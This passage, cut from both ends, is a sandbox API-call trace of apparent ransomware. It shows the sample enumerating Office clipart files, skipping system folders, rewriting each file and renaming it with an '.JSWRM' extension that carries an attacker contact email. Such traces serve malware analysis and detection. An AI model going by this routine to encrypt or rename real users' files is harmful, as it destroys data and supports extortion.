office\\root\\clipart\\pub60cor\\dd00255_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0076.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.045] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd744774, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb10, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00256_.WMF", cAlternateFileName="")) returned 1 [0076.045] lstrcmpiW (lpString1="DD00256_.WMF", lpString2=".") returned 1 [0076.045] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="..") returned 1 [0076.045] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="...") returned 1 [0076.045] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="windows") returned -1 [0076.045] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="recovery") returned -1 [0076.045] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="perflogs") returned -1 [0076.045] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="documents and settings") returned -1 [0076.045] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.045] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="system volume information") returned -1 [0076.045] lstrcmpiW (lpString1="DD00256_.WMF", lpString2="msocache") returned -1 [0076.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0076.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00256_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00256_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00256_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0076.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00256_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00256_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00256_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.046] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.046] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2832) returned 1 [0076.046] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.046] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb10) returned 0x24c1d0 [0076.046] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xb10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xb10, lpOverlapped=0x0) returned 1 [0076.048] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.048] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xb10, lpOverlapped=0x0) returned 1 [0076.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.048] CloseHandle (hObject=0x460) returned 1 [0076.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0076.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0076.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0076.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0076.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0076.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.049] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0076.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.049] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9456, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00261_.WMF", cAlternateFileName="")) returned 1 [0076.049] lstrcmpiW (lpString1="DD00261_.WMF", lpString2=".") returned 1 [0076.049] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="..") returned 1 [0076.049] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="...") returned 1 [0076.049] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="windows") returned -1 [0076.049] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="recovery") returned -1 [0076.049] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="perflogs") returned -1 [0076.049] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="documents and settings") returned -1 [0076.049] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.049] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="system volume information") returned -1 [0076.050] lstrcmpiW (lpString1="DD00261_.WMF", lpString2="msocache") returned -1 [0076.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00261_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00261_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00261_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00261_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00261_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00261_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.050] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=37974) returned 1 [0076.050] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9450) returned 0x24c1d0 [0076.050] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x9450, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x9450, lpOverlapped=0x0) returned 1 [0076.054] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.054] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x9450, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x9450, lpOverlapped=0x0) returned 1 [0076.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.054] CloseHandle (hObject=0x460) returned 1 [0076.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.054] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0076.054] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0076.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0076.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0076.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0076.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0076.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0076.055] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0076.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0076.055] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9c5e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00297_.WMF", cAlternateFileName="")) returned 1 [0076.055] lstrcmpiW (lpString1="DD00297_.WMF", lpString2=".") returned 1 [0076.055] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="..") returned 1 [0076.055] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="...") returned 1 [0076.056] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="windows") returned -1 [0076.056] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="recovery") returned -1 [0076.056] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="perflogs") returned -1 [0076.056] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="documents and settings") returned -1 [0076.056] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.056] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="system volume information") returned -1 [0076.056] lstrcmpiW (lpString1="DD00297_.WMF", lpString2="msocache") returned -1 [0076.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00297_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00297_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00297_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0076.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00297_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00297_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD00297_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0076.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0076.056] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0076.056] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.057] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=40030) returned 1 [0076.057] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9c50) returned 0x24c1d0 [0076.057] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x9c50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x9c50, lpOverlapped=0x0) returned 1 [0076.061] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.061] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x9c50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x9c50, lpOverlapped=0x0) returned 1 [0076.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0076.061] CloseHandle (hObject=0x460) returned 1 [0076.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0076.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0076.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0076.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0076.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0076.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0076.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.061] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00297_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00297_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0076.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0076.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0076.062] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd744774, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd744774, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd76a969, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x318, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD00372_.WMF", cAlternateFileName="")) returned 1 [0076.062] lstrcmpiW (lpString1="DD00372_.WMF", lpString2=".") returned 1 [0076.062] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="..") returned 1 [0076.062] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="...") returned 1 [0076.063] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="windows") returned -1 [0076.063] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="recovery") returned -1 [0076.063] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="perflogs") returned -1 [0076.063] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="documents and settings") returned -1 [0076.063] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.063] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="system volume information") returned -1 [0076.063] lstrcmpiW (lpString1="DD00372_.WMF", lpString2="msocache") returned -1 [0076.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD00372_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 